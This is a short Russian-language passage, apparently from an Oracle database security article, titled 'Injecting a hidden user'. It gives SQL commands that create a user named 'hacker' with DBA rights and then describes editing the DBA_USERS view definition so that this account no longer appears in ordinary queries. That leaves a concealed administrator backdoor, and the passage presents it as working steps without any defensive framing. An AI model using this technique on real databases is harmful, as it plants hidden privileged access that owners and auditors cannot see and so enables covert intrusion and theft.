Внедрение скрытого пользователя
SQL> Create user hacker identified by hacker; SQL> Grant DBA to hacker;
SQL> Select username from dba_users; SYS SYSTEM DBSNMP SYSMAN MGMT_VIEW HACKER
Затем добавляем в представление DBA_USERS (например, с помощью TOAD) одну строку "and u.name!='HACKER'", как показано на рисунке.
В результате в БД имеется скрытый пользователь, не обнаруживаемый обычными запросами.
